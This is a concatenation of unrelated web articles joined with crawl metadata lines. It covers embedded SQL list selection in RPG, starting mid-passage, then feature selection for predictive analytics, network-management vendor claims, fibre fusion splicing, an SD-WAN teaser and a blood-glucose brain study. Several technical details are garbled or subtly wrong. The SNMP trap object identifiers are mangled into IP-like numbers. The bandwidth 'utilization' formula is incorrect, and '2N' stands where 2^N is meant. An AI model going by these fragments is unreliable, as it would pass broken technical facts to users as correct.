C/exec sql C+ declare Input cursor for C+ select x.* from qcustcdt as x C+ where upper(lstnam) in C+ (:Nam01, :Nam02, :Nam03, :Nam04, C+ :Nam05, :Nam06, :Nam07, :Nam08, C+ :Nam09, :Nam10, :Nam11, :Nam12) C/end-exec C eval Nam11 = '!@#$%' C eval Nam12 = '!@#$%'
A second method is to use a sub query instead of a list of host variables. Create a temporary work file, into which the record selection values can be inserted. The following SQL query selects records customers whose names are Jones, Doe, and Vine.
create table qtemp/select (name char(12)) insert into qtemp/select values ('JONES') insert into qtemp/select values ('DOE') insert into qtemp/select values ('VINE') select cusnum,lstnam,init,city,state from qiws/qcustcdt where upper(lstnam) in (select name from qtemp/select)
Finally, a third method you can use is to create the list in a character string and use the LIKE predicate, rather than IN, to carry out record selection. The following RPG program accepts a list of last names in the second parameter.
* Note: QIWS must be in the library list at compile time * and at run time. Fqsysprt o f 132 printer D*entry plist D AAA111R pr extpgm('AAA111R') D ouStatus 8a D inList 120a const D AAA111R pi D ouStatus 8a D inList 120a const D AllOK c const('00-00000') D HostStruc e ds extname(QCUSTCDT) D List s 120a varying D PssrIsActive s n D SqlEof c const('02000') D Status s like(ouStatus) D True c const(*on) C/exec sql C+ set option closqlcsr=*endmod C/end-exec C/exec sql C+ declare Input cursor for C+ select x.* from qcustcdt as x C+ where ','||:List||',' C+ like '%,'||trim(upper(lstnam))||',%' C/end-exec C C eval *inlr = *on C eval Status = AllOK C eval List = %trim(inList) C/exec sql C+ open Input C/end-exec C if SQLStt >= SqlEof C eval Status = '10-' + SqlStt C exsr ShutDown C endif C C dow '1' C/exec sql C+ fetch Input into :HostStruc C/end-exec C select C when SqlStt = SqlEof C leave C when SQLStt > SqlEof C eval Status = '20-' + SqlStt C exsr ShutDown C endsl C except pline C enddo C C exsr ShutDown * ========================================================= C *pssr begsr C C eval *inlr = *on C C if PssrIsActive C return C endif C C eval PssrIsActive = true C C eval Status = '99-99999' C exsr Shutdown C C endsr C* ============================================= C ShutDown begsr C C eval *inlr = *on C C if Status <> AllOK C dump(a) C endif C C if %parms >= 1 C eval ouStatus = Status C endif C C return C C endsr Oqsysprt e pline 1 O lstnam O init +0001 O cusnum +0001 O city +0001 O state +0001
The names must be separated by commas and there must be no embedded blanks in the list. Here are some examples of such lists.
JONES JONES,SMITH JONES,DOE,SMITH,GREEN,WHITE
If the user enters the names Doe and Vine, and the system retrieves a record for VINE, the WHERE clause resolves to this:
where ',DOE,VINE,' like '%,VINE,%'
The system selects the record.
On the other hand, suppose the system reads the record of customer Jones. The WHERE clause resolves to this:
where ',DOE,VINE,' like '%,JONES,%'
The system does not select the record.
Now you have three ways to use dynamic lists of unpredictable sizes in embedded SQL. Since selection from lists allows you to give the user powerful and flexible report and inquiry programs, these techniques are worth mastering. | <urn:uuid:56b68b8f-ea21-4d50-9547-cacb0a89fcfe> | CC-MAIN-2022-40 | https://www.itjungle.com/2005/09/28/fhg092805-story02/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00494.warc.gz | en | 0.771092 | 1,718 | 2.515625 | 3 |
Will they? Won't they? - Use Artificial Intelligence to predict customer behaviour!
by Dr. Shashi Barak, on Jun 6, 2019 8:14:00 PM
Estimated reading time: 3 mins
As enterprises strive to increase their market share and stay ahead in a competitive business environment, they need to increasingly take the technology recourse. Predictive Analytics is a technology, which studies the behavior of existing as well as potential customers through social media channels and their online website activities to predict future scenarios and their probability of purchase.
By processing the gathered information to collect key features, including essential patterns and attributes, and selecting only the most appropriate features helps to create a simple yet powerful predictive model. Predictive Analytics has helped Amazon increase its sales by 30%. As per a report from McKinsey, predictive maintenance helps reduce call centre cost by approx 20-50%.
What is Predictive Analytics?
Predictive analytics encompasses a variety of statistical techniques from data mining, predictive modelling, and machine learning, which analyze current and historical facts to make predictions about future or otherwise unknown events.
How to create a powerful Predictive Model?
A highly effective model is built using a minimal set of features, which contain enough information to train a model to make accurate predictions/classifications.
Selection of useful features out of N given features is quite complex. Mathematically, we have 2N number of possible subsets. For example, for a problem with 20 features, we have 1048576 number of possible subsets of features, so one can easily guess the complexity if there are 40 features to deal with.
To avoid the computational burden, the number of selected input variables should not be too high. Similarly, it should not be too less either as the input variables would not be able to provide essential information.
To build an efficient model, the number of feature vectors should be optimum so that the behavior of the given phenomenon can be described with minimum non-redundant features with informative variables.
Feature selection method:
Feature selection methods can be categorized into three categories: filters, wrappers, and embedded methods.
- Filter method: In filter methods, a numerical index is obtained for each variable using some statistical test such as Pearson’s correlation coefficient, information gain, mutual information, maximum relevance, etc. Generally, the variables which are characterized by the high index are finally selected. If two features contain the same information, one can be removed using either correlation or mutual information or some other criterion.
- Wrapper method: Wrapper method uses actual prediction/classification algorithm to build a model with a subset of features and then evaluates its performance. It tries different subsets of features and the subset for which model shows the best performance is selected. One drawback of this approach is that it is computationally very expensive.
- Embedded method: Unlike filter and wrapper methods, in embedded methods, feature selection is integrated with machine learning part and is used for model generation.
The main difference between embedded method and filter method is while embedded method requires iterative updates, the model parameters are selected according to the model performance. The wrapper method considers only the model performance of the selected set of features.
Why Wrapper approach is preferred over Filter and Embedded methods?
Suppose, we have 26 features viz. a,b,c,d,...,z. Out of these 26 features, each individual attribute may not be informative by itself, but a combination of them may be (for example: Perhaps b and c have no information separately, but (b + c) or b*c, on the other hand, might have some information). Now, Filter feature selection approach may miss it as it evaluates features in isolation, not in combination, but Wrapper approach can leverage this information as it is using a prediction or classification algorithm actually for evaluation.
To sum up, the optimal set of features should contain the minimum number of input variables, which are required to describe the behavior of the considered system or phenomenon with minimum redundant variables, which at the same time provide maximum information. A more accurate, efficient, simple and easily interpretable model can be built if the optimal set of input variables is identified.
The rule of thumb, which is followed for feature selection across analytics is that Filter method is used when the number of features is large in the dataset while Wrapper method is used when the number of features is moderate. But in practice, it's usually a better idea to use Wrapper method for key feature selection as it takes the performance of the actual classifier you want to use into account, and different classifiers vary widely in the usage of information.
Using these simple, yet powerful techniques to build a predictive model, enterprises can improve their sales and OpEx figures and stay ahead in a globally competitive business environment. | <urn:uuid:1e9023bd-cc19-4861-868b-9d60c10aa72a> | CC-MAIN-2022-40 | https://blog.datamatics.com/identify-key-predictors-and-influencers-for-predicting-customer-behavior-by-using-artificial-intelligence | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00494.warc.gz | en | 0.909384 | 984 | 2.953125 | 3 |
Network management usually refers to the board subject of managing computer networks using a wide variety of software and hardware products. This article analyzes and ranks the Top 10 issues and misrepresentations IT managers consistently address in managing their networks.
Simple Network Management Protocol (SNMP) is Simple
This ranks as the number one deception in the industry. SNMP is by no means simple for even a seasoned network engineer. In theory, it is a simple protocol that governs how management data is retrieved and processed from network devices by a Network Management System (NMS) and how these network devices send management information back to an NMS. Getting useful and meaningful data for your NMS via SNMP is the real challenge and is where most vendors distort their capabilities and unfortunately, deceive their potential clients.
Most network management vendors claim to be SNMP-capable. What they don´t tell you is that what they really offer is simple SNMP GET requests, which ask a network device to return the current value of a specific object identifier (OID), such as “packets IN.” This simplistic polling yields data such as: packets in = 5,992. What can you do with this information? Not much, of course.
A true NMS assembles appropriate OID values into meaningful statistics like Bandwidth Utilization. Most vendors won´t be honest and explain their SNMP limitations accurately. The statistic Bandwidth Utilization is not a single OID object, as many vendors will have you believe. The actual statistic is created by using the formula: ((IN pkts in Octets + OUT pkts in Octets) * 8) /1024. Many vendors will say they can provide statistics like Bandwidth Utilization, but in truth, they leave it up to you to figure out which OIDs you need and how you need to perform the appropriate mathematics. Be sure to see this functionality fully demonstrated to avoid being misled.
To take protective measurements a step further, ask your vendor to provide vendor-specific statistics that are important in your infrastructure. If you don´t know what is important, it may be that you´ll never be able to fully implement this powerful monitoring capability. Unless you are a programmer or SNMP expert, be sure to look for an NMS that has the statistics you are looking for already built-in.
The difference between SNMP Polling and SNMP Monitoring can be illustrated below:
SNMP Polling is the process of a network management station (NMS) sending or “polling” SNMP GET requests to the remote device. In other words, it asks the device for information and the device responds with a value. SNMP Monitoring is when the network device is configured to send SNMP traps (messages) to an NMS without a specific request.
The problem is, as with most network monitoring information, there may be many, many trap messages and they are usually cryptic in raw form.
Example Raw SNMP Trap:
“9/13/2002 9:39:8 : grtse38;grtse38;enterprises.188.8.131.52;6;.9002;
enterprises.184.108.40.206.1001.0 = 0 enterprises.220.127.116.11.1003.0 = 0
enterprises.18.104.22.168.1004.0 = 1 enterprises.22.214.171.124.1005.0 =
“ONLINE” enterprises.126.96.36.199.1006.0 = “FAILED”
This message by itself does not produce the useful information that is actionable by the network administrator. The network management product must accept this message, simultaneously link its contents to a Management Information Base (MIB) definition file, then convert it to a useful message such as, “Server1 PowerSupply 1 FAILED.” To state that you can monitor SNMP traps without doing MIB lookups and message conversion, wouldn´t qualify as a feature for most users. In addition, you may also desire specific integration with some of the most common and useful SNMP trap producers such as Compaq (HP) Insight Manager, Dell OpenManage® and IBM Director®.
Root Cause Analysis
This “feature” means different things to different vendors and places #2 on our list. Delivering true Root Cause Analysis means that your NMS can filter through hundreds (or thousands) of events and point you directly to the root cause of either an outage or performance degrading event – a very tall order.
To separate fact from fiction in this area, we generally like to separate monitoring capabilities into three categories: Component Monitoring, Transaction Monitoring and Event Correlation.
True Component Monitoring means that your NMS is capable of three distinct functions. These include the ability to:
1. Monitor all of the individual components’ “moving parts” of your application across all of the devices and software on which it depends.
2. Understand and group the relationship of these components.
3. Represent those components as a single view of your application.
Many NMSs boast about the number of “monitors” they have and their ability to monitor various devices within your network. With these capabilities, the claim is often made that these NMSs have the ability to provide Component Monitoring and as an end result, Root Cause Analysis. Unfortunately, without #2 and #3 above, the closest you will come to root cause identification is several individual component alarms that are not correlated to other events, or to your specific application.
Often, you won´t know which event came first and what chain reactions were caused.
Transaction Monitoring requires that your NMS have the ability to create actual or synthetic user transactions to exercise every component of an application end-to-end. While Component Monitoring is powerful and valuable, Transaction Monitoring provides a more holistic view from the user´s perspective and ensures that even unknown components are exercised.
Two examples would be email and Web Transactions probes. An email probe creates, sends, receives and measures email packets out of and back into your network, assuring that email is flowing properly. This mechanism is sure-fire and enables you to rest easier knowing this critical app is functioning properly. If a problem does occur, a true Transaction Monitor can provide accurate root cause identification by specifying which component failed or is causing performance degradation.
Event Correlation is the ability to intelligently correlate storms of events with the outcome being the display of the true root cause. Many times, this functionality is designed to suppress the “noise” so that you can see the root cause more clearly. Event Correlation can be achieved via any of the following mechanisms by:
Service Group: For example, if a Critical alarm occurs on any item in a service group, all following alarms can be correlated into a single event.
Topology: Alarms can be correlated by manually or auto-discovered Layer 2 or Layer 3 network topology or via Dependency Maps.
Host: Multiple alarms from a single device are consolidated into a single event.
Domain: Multiple alarms from a logical domain are consolidated into a single event.
IF-THEN manual rules creation and scripting.
Automated or manually created dependency maps.
Above all, one of the newest breakthroughs in Root Cause Analysis is to provide real-time anomaly detection. In order to detect anomalies, your NMS must have collected sufficient data profiling your network´s behavior. Deviations and anomalies in that behavior are then automatically detected and displayed to deliver rapid root cause identification.
Availability Monitoring and Reporting
Ranking #3 on our list of network management lies is Availability Monitoring and Reporting. Most NMS products claim to monitor for availability. This is a blanket statement that must be carefully inspected.
Today´s applications and networks are more complex. Determining application availability is almost always more involved than the mechanism they claim is monitoring it. The primary mechanism used by most NMS products to determine device availability is the trusty ICMP ping. If a device responds to ping, it is assumed that the device is therefore available.
There are many problems with this assumption. First, a device may be responding to ping, but the application may very well be down for any number of reasons. Simple examples include: application services stopped on a server (server is not down but is responding to ping), application ports are blocked by a firewall (pings are allowed, a specific port is not). So, if your NMS is monitoring for availability using ICMP ping as its sole mechanism, be prepared for disappointment.
A true NMS solves the complex issue of availability monitoring and accuracy by building in the ability to specify which events are ´availability affecting.’ This is a very powerful capability because it transcends the traditional event category limitations of Critical, Major, Minor, Warning and Information. In most NMSs, Critical simply means “needs immediate human intervention.” Some Critical events may be ´availability affecting,’ others not. For example, if one power supply in a server fails and the redundant power supply takes over, this may generate a Critical event even though it has not yet affected availability. However, if both power supplies fail, then you have a definitive ´availability affecting´ event.
Availability Reporting suffers the same problem in most NMS´s, reporting either only whether or not a device has responded to ping. Some NMS´s use the “uptime” feature built into operating systems to provide their availability reports. This method is flawed as well because it doesn´t account for planned or scheduled downtimes such as voluntary reboots.
SLA Monitoring, Measurement and Reporting
True SLA management is indeed an advanced and sophisticated subject. In order to truly manage SLAs, your NMS must have the ability to establish performance baselines, deliver accurate availability results and have a way to measure improvements or results against the SLA.
In order to manage in accordance with an SLA, your NMS must enable users to organize services as they are defined within the SLA. If you are confined to a single view or a device centric view, it may not be possible to organize your monitored objects in a way that matches your SLA.
Next, your NMS must have the ability to set an SLA score. This would be your perfect score if you indeed met your SLA requirements. Any events that are SLA affecting would then be subtracted from your SLA score providing you with real measurements of SLA compliance. Using this real SLA management mechanism, IT managers can honestly measure and improve their results against real world SLAs.
Lastly, any good SLA engine should be “service window aware.” This means you have the ability to define hours of operation for critical apps, and conversely planned maintenance and outage windows. Not having this feature makes it difficult, if not impossible, to provide accurate SLA measurements and reports.
Capacity Planning and Analysis
In order to provide Capacity Planning and Analysis, your NMS has to have the following capabilities:
Ability to collect historical data
Ability to use and analyze historical data to provide accurate forecasts and predictions of future behavior
The first requirement assures that you need to be collecting data in a relational database. If the proposed NMS does not use a relational database, it is certain that you will have minimal data collection, storage and reporting capabilities.
The second requirement is more advanced. Once data is stored in a database, what your NMS can do with that data is where you find true value. Raw data is useless, information is valuable. A good NMS turns your raw data into valuable, time saving and reliable information. Better NMS´s use sophisticated mathematical probability and statistical algorithms to provide accurate trend analysis for reliable forecasts and planning.
All vendors claim their products are easy to use and configure. They all look good during the demo and all seem like they are easy to implement. Of course, this is why “Easy-to-Use” ranks #6 on our list. There are many different areas where this claim usually becomes fictitious. Be on the lookout for these “features” as sometimes direct indicators that the product will not be easy-to-use or configure:
100% Agentless. While this one sounds good, it really is a dishonest claim. Agentless implies that there is no software to install and therefore it is easier to deploy, manage and maintain. Sounds reasonable. Of course, the devil is the truth. There is no true “agentless” product.
The proposed NMS simply uses the “agents” that come with another vendor´s product instead, such as: Windows´ Host MIB or WMI services agent. Host MIB is not enabled by default in Windows 200x; you have to manually configure it which takes over 30 steps. So, perhaps you don´t have to install a proprietary agent, but you do have to turn on and implement someone else´s. This can cause more problems than the ones they are purported to solve.
Monitors or Agents for Specific Applications. Having monitors or agents for specific apps usually means that you have to install one or more agents on a remote host. This can create a management and maintenance headache and impose performance degradation on the remote hosts. Look for an NMS that combines the best of both agent and agentless approaches and has a low-impact host agent.
Central Event Store or Consolidated Event Viewer. This means that your NMS collects all raw events (98% of which you don´t need) into a centralized database, causing unnecessary network traffic overload and processing problems. You are then left to learn and write complex rules and filters to find useful events which are typically the #1 reason NMS projects are abandoned or considered failures.
One of the hot buzzwords in IT today is “service management.” It refers to managing applications and infrastructure as end-to-end services from the client´s perspective and moving away from the device-centric approach. Today´s complex applications rely upon a multitude of protocols and devices which have to work seamlessly together. Then they have to do so in a world of increasingly tight security, adding a whole new dimension in complexity and potential troubleshooting pitfalls. True Service Management will enable you to view an application as its packets flow through your network, almost like watching water flow through a plumbing system. The challenge of Service Management in networks is that the pipes are carrying a diverse payload consisting of several different fluids.
Your NMS must enable you to create multiple views of your infrastructure as well as one that accurately represents your services. For example, your core router carries all of your traffic. To accurately represent your Customer Relationship Management (CRM) service, you would need to create a view that monitors only your CRM traffic flowing through your router and nothing else. This can´t be an exclusive feature. You must be able to set this up for all of your services and view them accordingly. To continue the example, your Service View might include the application services on a particular set of Windows servers, TCP ports on your firewall and perhaps objects in a specific database instance.
Plug and Play Installation
Apparently, “Plug and Play” means different things to different NMS vendors. To most of us, this means that a product we buy is up and running with minimal configuration, in a matter of minutes or hours. If we have to hire expensive consultants and spend weeks or months implementing and learning the product, it is not “plug and play.” Ask your vendor for references on how long it took to implement the product, how much daily consultants cost and what they mean by “plug and play.”
Top warning signs that an NMS product cannot be “Plug and Play” include the following:
More than 200 systems integration companies exist to implement and configure their product.
Daily consulting rates for their product are higher than any normal consulting rate, typically 2x or 3x normal consulting rates.
Numerous third party products exist to enhance the functionality.
Although there should be truth-in-advertising laws to cover such claims, unfortunately there is no way to enforce this often exaggerated claim. If only 2% of your product is available via a browser, the vendor is likely to claim it is “web-based.” Being fully web-based has both advantages and disadvantages. Be sure to size up how web-based a particular NMS really is. Some offer reports only, others provide limited configuration capabilities and any combination in between. Disadvantages include the loss of some “windows-style” comforts such as right-click options and drag & drop capabilities. A fully web-based NMS will provide 100% of its features and functionality in a browser, with no management client software to install, including java applets. This provides true anywhere web-based access.
Ahh, we saved the best for last. Whose best practices are they talking about anyway? The ones concocted in the vendor´s lab? Best practices should mean those agreed upon by industry standards bodies or trusted user groups. Unfortunately for all of us, no such standards really exist for Network and Systems Management products. Best practices can be anything a vendor claims them to be. Lately, some vendors tout best practices from the IT Infrastructure Library (ITIL), a set of standards originally developed by the British government. Suffice to say that one´s best practices may be another´s poison and that there´s no “one size fits all” for monitoring an infrastructure effectively.
What we can all agree on is that there exists a base list of known events and performance metrics you should be monitoring. Buyers of NSM products should not have to figure out these known items on their own. These events are “best practices” and should be built-in with appropriate thresholds pre-determined. If you are lucky, the NSM´s “best practices” will be based upon OEM recommendations and published sources. | <urn:uuid:d2cde572-1954-49fc-b305-af46d5a5474f> | CC-MAIN-2022-40 | https://it-observer.com/top-10-network-management-lies-deceptions.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00494.warc.gz | en | 0.93129 | 3,762 | 2.828125 | 3 |
As fibre deployment has become mainstream, splicing has naturally crossed from the outside plant (OSP) world into the enterprise and even the data centre environment. Fusion splicing involves the use of localized heat to melt together or fuse the ends of two optical fibres. The preparation process involves removing the protective coating from each fibre, precise cleaving, and inspection of the fibre end-faces. Fusion splicing has been around for several decades, and it’s a trusted method for permanently fusing together the ends of two optical fibres to realize a specific length or to repair a broken fibre link. However, due to the high costs of fusion splicers, it has not been actively used by many people. But these years some improvements in optical technology have been changing this status. Besides, the continued demand for increased bandwidth also spread the application of fusion splicing.
New Price of Fusion Splicers
Fusion splicers costs have been one of the biggest obstacles to a broad adoption of fusion splicing. In recent years, significant decreases in splicer prices has accelerated the popularity of fusion splicing. Today’s fusion splicers range in cost from $7,000 to $40,000. The highest-priced units are designed for specialty optical fibres, such as polarization-maintaining fibres used in the production of high-end non-electrical sensors. The lower-end fusion splicers, in the $7,000 to $10,000 range, are primarily single-fibre fixed V-groove type devices. The popular core alignment splicers range between $17,000 and $19,000, well below the $30,000 price of 20 years ago. The prices have dropped dramatically due to more efficient manufacturing, and volume is up because fibre is no longer a voodoo science and more people are working in that arena. Recently, more and more fibre being deployed closer to the customer premise with higher splice-loss budgets, which results in a greater participation of customers who are purchasing lower-end splicers to accomplish their jobs.
More Cost-effective Cable Solutions
The first and primary use of splicing in the telecommunications industry is to link fibres together in underground or aerial outside-plant fibre installations. It used to be very common to do fusion splicing at the building entrance to transition from outdoor-rated to indoor-rated cable, because the NEC (National Electrical Code) specifies that outdoor-rated cable can only come 50 feet into a building due to its flame rating. The advent of plenum-rated indoor/outdoor cable has driven that transition splicing to a minimum. But that’s not to say that fusion splicing in the premise isn’t going on.
Longer distances in the outside plant could mean that sticking with standard outdoor-rated cable and fusion splicing at the building entrance could be the more economical choice. If it’s a short run between building A and B, it makes sense to use newer indoor/outdoor cable and come right into the crossconnect. However, because indoor/outdoor cables are generally more expensive, if it’s a longer run with lower fibre counts between buildings, it could ultimately be cheaper to buy outdoor-rated cable and fusion splice to transition to indoor-rated cable, even with the additional cost of splice materials and housing.
As fibre to the home (FTTH) applications continue to grow around the globe, it is another situation that may call for fusion splicing. If you want to achieve longer distance in a FTTH application, you have to either fusion splice or do an interconnect. However, an interconnect can introduce 0.75dB of loss while the fusion splice is typically less than 0.02dB. Therefore, the easiest way to minimize the amount of loss on a FTTH circuit is to bring the individual fibres from each workstation back to the closet and then splice to a higher-fibre-count cable. This approach also enables centralizing electronics for more efficient port utilisation. In FTTH applications, fusion splicing is now being used to install connectors for customer drop cables using new splice-on connector technology and drop cable fusion splicer.
A Popular Option for Data Centres
A significant increase in the number of applications supported by data centres has resulted in more cables and connections than ever, making available space a foremost concern. As a result, higher-density solutions like MTP/MPO connectors and multi-fibre cables that take up less pathway space than running individual duplex cables become more popular.
Since few manufacturers offer field-installable MTP/MPO connectors, many data centre managers are selecting either multi-fibre trunk cables with MTP/MPOs factory-terminated on each end, or fusion splicing to pre-terminated MTP/MPO or multi-fibre LC pigtails. When you select trunk cables with connectors on each end, data centre managers often specify lengths a little bit longer because they can’t always predict exact distances between equipment and they don’t want to be short. However, they then have to deal with excess slack. When there are thousands of connections, that slack can create a lot of congestion and limit proper air flow and cooling. One alternative is to purchase a multi-fibre pigtail and then splice to a multi-fibre cable.
Inside the data centre and in the enterprise LAN, 12-fibre MPO connectors provide a convenient method to support higher 40G and 100G bandwidth. Instead of fusing one fibre at a time, another type of fusion splicing which is called ribbon/mass fusion splicing is used. Ribbon/mass fusion splicing can fuse up to all 12 fibres in one ribbon at once, which offers the opportunity to significantly reduce termination labor by up to 75% with only a modest increase in tooling cost. Many of today’s cables with high fibre count involve subunits of 12 fibres each that can be quickly ribbonized. Splicing those fibres individually is very time consuming, however, ribbon/mass fusion splicers splice entire ribbons simultaneously. Ribbon/mass fusion splicer technology has been around for decades and now is available in handheld models.
Fusion splicing provides permanent low-loss connections that are performed quickly and easily, which are definite advantages over competing technologies. In addition, current fusion splicers are designed to provide enhanced features and high-quality performance, and be very affordable at the same time. FS provides various types and uses of fusion splicers with high quality and low price. For more information, please feel free to contact us at firstname.lastname@example.org.
Original article source: | <urn:uuid:66ed2849-e1e2-432f-a91a-4f0816728a6b> | CC-MAIN-2022-40 | https://www.fiber-optic-equipment.com/tag/mtpmpo | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00494.warc.gz | en | 0.945376 | 1,421 | 2.875 | 3 |
Why Customer Feedback is Killing your Innovation Efforts
What feedback really means
The return of a portion of the output of a process or system to the input, especially when used to maintain performance or to control a system or process.
Feedback is not what people think it is. Originally, feedback is an electronic signal received in response to an electronic output. The signal received back can help determine if the outbound signal was “right” or received properly. Today, the term can be applied to non-electronic and non-automated processes, too.
Feedback is good for improving or correcting a process. It’s not good for measuring the impact of the process. Feedback on a product feature, for example, may tell you if it works as expected, but not if the feature contributes to some larger desired outcome. If you want to know about the desired outcome, you have to ask explicitly for that.
True “feedback” must be in response to a specific outbound signal and must be provided by somebody or something that fundamentally understands that output and its purpose.
Instead, we do it wrong. We ask for feedback:
- Without defining the objective
- From people who have no businesses providing it
- In ways that don’t work
Feedback vs. opinions
Your method of eliciting feedback matters (and actually determines whether you are in fact getting “feedback”). Ironically, your target is more likely to give feedback in the true definition of the word, than how you desire or intend it to be. Asking for feedback takes the target out of the correct context for your purposes.
Entrepreneurs love the idea of pitching their idea and then asking for feedback: “What do you think?” The question doesn’t seek to understand whether the product solves the potential user’s problem, but rather asks the customer to help the entrepreneur. The context is the entrepreneur’s problem of desiring a successful product.
The “user” is prone to give advice on the pitch or on the potential success of the idea. The features she may proffer are not ones she will necessary use or pay for, but rather features she would build as if she were the entrepreneur!
Is that what you intended?
Let’s look at an example.
Say you’re seeking to disrupt air travel hoping to reinvent the traveler’s experience through modular airplane interiors. In pursuit of this idea, you might want to learn:
- The level of dissatisfaction with current design
- Whether the new system will improve the level of satisfaction
- Whether the new system will hurt the current level of satisfaction
You could use surveys to get “feedback” on some aspects of current air travel. You could have users rate their experiences; you could utilize Net Promoter Score to measure customer “passion.” Customers will be able to respond honestly because you’re asking how they feel with respect to their travel experience.
It’s not “feedback” to ask them whether they’d like a modular interior design. Nor is it “feedback” to ask if they’d feel less safe. They don’t know. They can’t know. Similarly, it’s not “feedback” to ask airplane manufacturing people those questions.
You’re asking for customer speculation. Is this valuable? Is this your intention? Again, true feedback demands knowledge or expertise with respect to the question being asked.
- “Feedback” is for responding to a defined process or output
- Qualitative “feedback” is not right for measuring customer impact or achieving aspiration
- Feedback giver should be an “expert” in the domain they’re providing feedback on
Feedback’s role in Lean Innovation
Asking for feedback incorrectly is simply an invitation to criticize.
The target is no longer acting as an agent of the process and is now mentally engaged with the question about the quality of your performance, regardless if the process achieved its purpose or not.
To many startup entrepreneurs and corporate innovators, asking potential customers and users for “feedback” is the sum and scope of their “customer development” practices. It also happens to be a primary critique of lean startup, pointing to the comments of “visionary” entrepreneurs famous for stating that they’d never ask customers about product needs or desires.
Thing is, the “visionaries” are right. But the problem is not in the asking, it’s how one asks and what one learns. Customers are notoriously bad at providing useful product “feedback” because their responses are merely speculated opinions based on current preferences from past experiences. They know what they like and don’t like about existing products, but that’s about it.
For this reason, Lean Innovation techniques seek to run experiments that measure customer behavior that better demonstrate the value of a product or feature instead of merely asking for “feedback” about a solution idea.
Generally, the more “innovative” the idea, the less likely asking your potential customer about it will yield accurate results. This is also why many traditional market research techniques like focus groups and surveys are also less likely to yield useful data or insights for more innovative ideas.
When working on something new, consider if you should ask for feedback at all.
Anyone will give you feedback whether or not they have the expertise to do so. How you present your request determines the likelihood of its relevance.
This article was originally published on Medium and has been republished with the author’s permission. | <urn:uuid:21c0e129-4d23-40d6-8e61-d4f4b704b939> | CC-MAIN-2022-40 | https://beyondexclamation.com/why-customer-feedback-is-killing-your-innovation-efforts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00694.warc.gz | en | 0.932969 | 1,218 | 2.515625 | 3 |
Findings from NIH-funded study could provide basis for forensic SIDS test.
Blood samples from infants who died of Sudden Infant Death Syndrome (SIDS) had high levels of serotonin, a chemical that carries signals along and between nerves, according to a study funded in part by the National Institutes of Health.
The finding raises the possibility that a test could be developed to distinguish SIDS cases from other causes of sleep-related, unexpected infant death.
The study, led by Robin L. Haynes, Ph.D., of Boston Children’s Hospital and Harvard Medical School, appears in the Proceedings of the National Academy of Sciences. NIH’s Eunice Kennedy Shriver National Institute of Child Health and Human Development (NICHD) provided funding for the work.
SIDS is the sudden death of an infant under one year of age that remains unexplained after a complete autopsy and death scene investigation.
In the current study, researchers reported that 31 percent of SIDS infants (19 of 61) had elevated blood levels of serotonin.
In previous studies, the researchers reported multiple serotonin-related brain abnormalities in SIDS cases, including a decrease in serotonin in regions involved in breathing, heart rate patterns, blood pressure, temperature regulation, and arousal during sleep.
Taken together, the researchers wrote, the findings suggest that an abnormality in serotonin metabolism could indicate an underlying vulnerability that increases SIDS risk and that testing blood samples for serotonin could distinguish certain SIDS cases from other infant deaths. However, they caution that more research is needed.
NICHD’s Safe to Sleep campaign provides information on ways to reduce the risk of SIDS and other sleep-related causes of infant death.
Rosemary Higgins, M.D., of the NICHD Pregnancy and Perinatology Branch, which oversaw the study, is available for comment.
Funding: Funding provided by NIH/Eunice Kennedy Shriver National Institute of Child Health and Human Development.
Source: Meredith Daly – NIH/NICHD
Original Research: Full open access research for “High Serum Serotonin in Sudden Infant Death Syndrome” by Robin L. Haynes, Andrew L. Frelinger III, Emma K. Giles, Richard D. Goldstein, Hoa Tran, Harry P. Kozakewich, Elisabeth A. Haas, Anja J. Gerrits, Othon J. Mena, Felicia L. Trachtenberg, David S. Paterson, Gerard T. Berry, Khosrow Adeli, Hannah C. Kinney, and Alan D. Michelson in PNAS. Published online July 3 2017 doi:10.1073/pnas.1617374114 | <urn:uuid:4f1f3a8c-f99a-4379-9b76-75c8ecf7a21e> | CC-MAIN-2022-40 | https://debuglies.com/2017/07/04/high-serotonin-levels-blood-of-sids-infants/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00694.warc.gz | en | 0.897142 | 564 | 2.6875 | 3 |
More and more companies are talking about SD-WAN. But what is SD-WAN and what are its benefits over a conventional WAN? We’re here to explain. Let’s get really basic. SD-WAN (say the letters S and D, and then say WAN like it’s a word) stands for Software Defined Wide Area Network. A Wide Area Network, of course, is referred to as a WAN. In a conventional WAN, business branches connect to a headquarters or a datacentre with conventional routers and leased-line connections.
When you’re overhauling your legacy phone system, a good dashboard for your phone system should be a key component of your decision-making.
Fill out the form and one of our business experts will be in touch. | <urn:uuid:696dd004-9d1c-47c3-bdb0-29d4bf412c8a> | CC-MAIN-2022-40 | https://www.thinktel.ca/blog/2021/01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00694.warc.gz | en | 0.917608 | 171 | 2.5625 | 3 |
New research has found blood glucose levels even at the normal range can have a significant impact on brain atrophy in ageing.
Dr Erin Walsh, lead author and post-doctoral research fellow at ANU, said the impacts of blood glucose on the brain is not limited to people with type 2 diabetes.
“People without diabetes can still have high enough blood glucose levels to have a negative health impact,” said Dr Walsh from the Centre for Research on Ageing, Health and Wellbeing (CRAHW) at ANU.
“People with diabetes can have lower blood glucose levels than you might expect due to successful glycaemic management with medication, diet and exercise.
“The research suggests that maintaining healthy blood glucose levels can help promote healthy brain ageing.
If you don’t have diabetes it’s not too early and if you do have diabetes it’s not too late.”
Dr Walsh said people should consider adopting healthy lifestyle habits, such as regular exercise and healthy diets.
“Having a healthy lifestyle contributes to good glycaemic control without needing a diabetes diagnosis to spur them into adopting these good habits,” she said.
“It helps to keep unhealthy highly processed and sugary foods to a minimum. Also, regular physical activity every day can help, even if it is just a going for walk.”
